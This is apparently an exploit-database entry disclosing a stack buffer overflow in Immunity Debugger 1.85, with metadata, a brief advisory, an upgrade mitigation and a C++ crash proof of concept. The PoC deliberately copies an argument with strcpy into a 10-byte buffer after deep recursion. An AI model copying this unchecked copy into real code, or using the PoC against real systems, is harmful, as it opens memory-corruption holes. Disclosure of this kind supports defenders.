Buffer Overflow in Immunity Debugger 1.85

vendor:

Debugger

by:

Veysel HATAS

7,8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Debugger

Affected Version From: 1.85

Affected Version To: 1.85

Patch Exists: YES

Related CWE: N/A

CPE: a:immunity:debugger

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP, Win7

2014

Buffer Overflow in Immunity Debugger 1.85

A buffer overflow vulnerability exists in Immunity Debugger 1.85. The vulnerability is caused due to a boundary error when handling user-supplied data. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted argument to the vulnerable application. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Immunity Debugger

Source

Exploit-DB raw data:

/* Filename :  Crash_POC.cpp

# Exploit Title: [title]
# Date: 20 March 2014
# Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net
# Vendor Homepage: https://www.immunityinc.com/
# Software Link: https://www.immunityinc.com/products-immdbg.shtml
# Version: 1.85
# Tested on: WinXP, Win7

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int g_Count;

void foo(char *data);

int main(int argc, char* argv[])
{
      g_Count = 0;

      foo(argv[1]);
      return 0;
}

void foo(char *data)
{
      char salla[10];

      printf("Deneme - %d\n", g_Count);
      g_Count++;

      if (g_Count == 510){
            strcpy(salla, data);
      }

      try{
            foo(data);
      }
      catch(int e){
            printf("Error code is : %d", e);
      }
}